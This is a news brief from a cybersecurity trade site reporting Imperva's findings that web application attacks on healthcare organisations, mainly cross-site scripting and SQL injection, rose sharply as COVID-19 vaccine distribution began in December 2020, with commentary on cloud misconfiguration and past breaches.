Skip to main content
close search
site logo
Dive Brief

Healthcare industry sitting on ticking time bomb of web application attacks

Published Jan. 12, 2021
Samantha Schwartz's headshot
Samantha Schwartz Reporter
workplace, mental health, wellness, employee, wellbeing
Photo by Thought Catalog on Unsplash

Dive Brief:

  • Web application cyberattacks in the healthcare industry increased 51% in December, as COVID-19 vaccine distribution began, according to a report by Imperva Research Labs released Tuesday. 
  • Healthcare organizations, on average, were hit by nearly 500 web application attacks every month in 2020, a 10% year-over-year increase, according to Imperva. 
  • In December, cross-site scripting (XSS) attacks spiked 43%, accounting for the majority of overall web application attacks. SQL injections (SQLi) attacks were the second-largest in volume, increasing 44%, according to Imperva. Protocol manipulation attacks increased 76% and represented the third-largest volume.

Dive Insight:

As the healthcare industry rose to the challenges of the pandemic, bad actors kept pace. General physician offices adopted more third-party solutions and JavaScript APIs to provide more telehealth services, expanding their original attack surface.

Organizations use local applications as web applications through browsers, and every addition of a new application increases the number of targets for hackers. Common code is recycled, which makes preventing injection attacks challenging. XSS attacks, for example, offer boundless exploitability. 

The spike in web application attacks directly correlates with how "many of the COVID-19 mitigation efforts are powered by new web applications and services," said Terry Ray, SVP and Fellow at Imperva, though the company can't exactly pinpoint why the rise in attacks coincide with vaccine distribution. 

"It would not be unreasonable to believe that attackers have found their way into vulnerabilities through connection points. We may not understand the full impact of these attacks for some time, unfortunately," said Ray. 

Data breaches rooted in web application flaws are often traced back to issues with:  

  • Cross-site scripting
  • Broken access control
  • Resetting passwords due to failing to invalidate a session
  • Server security misconfiguration
  • Bypassing authentication due to broken authentication or session management

Each flaw provides attackers with a variety of execution strategies. 

High-profile data breaches, including Equifax and Capital One, were linked to web application issues, specifically misconfigured web application firewalls. In 2018, Equifax's former SVP and CIO for Corporate Global Platforms, said the firm's "aggressive growth strategy" piled on technological complexity. Equifax was acquiring other companies while building IT in house. It was a classic scenario of security falling behind fast-paced innovation. 

"While many leaders worry that taking time to secure data might slow down their innovation projects, that mindset is indefensible," said Ray. "The answer to a growing number of cyberattacks isn't to throw more point solutions at the issue." 

Before cloud-based systems became standard, organizations prioritized perimeter defense over data security. The cloud overhauled perimeter security, and a web application misconfiguration is seldom ever the cloud provider's responsibility. Exposed cloud databases, including Docker and Redis, are an increasing normality, Imperva found in earlier research.  This year, healthcare provides rushed to adopt more cloud-based solutions to keep pace with pandemic-related demands. 

"In a race to deploy new services, technology is added outside of the purview of the information security team. That means, there are more vulnerabilities to miss than ever before," said Ray. Security is responsible for knowing "where their data is at all times across all environments, how it is used, and who has access to it in order to apply the appropriate controls." 

Cyberattacks on the healthcare industry have risen 45% since November, while other attacks against other industries have risen at half that rate, according to research from Check Point

In 2019, healthcare providers became a primary target of ransomware attacks, a trend which continued into 2020 with a CISA alert for the Ryuk ransomware strain. However, "it's only the vulnerable application frontend to all healthcare data that experiences the variety and volume of daily [web application] attacks," according to Imperva.

Recommended Reading

Filed Under: Vulnerability

Editors' picks

Company Announcements

View all | Post a press release
Nile Adds Industry’s First Campus Zero Trust Delivered As a Service
From Nile
November 21, 2024
DigiCert Unveils 2025 Security Predictions
From DigiCert
November 21, 2024
TrustNet Named 2024’s Best Compliance Advisory and Audit Firm at CDM’s Annual Top InfoSec Inno…
From TrustNet
November 06, 2024
Fathom5’s ARIA Technology Joins NSIN Propel Maritime Digital Defense Accelerator
From Fathom5
November 18, 2024
Editors' picks
Latest in Vulnerability
image/svg+xml
Industry Dive is an Informa business
© 2024 Industry Dive. All rights reserved. | View our other publications | Privacy policy | Terms of use | Take down policy.
Cookie Preferences / Do Not Sell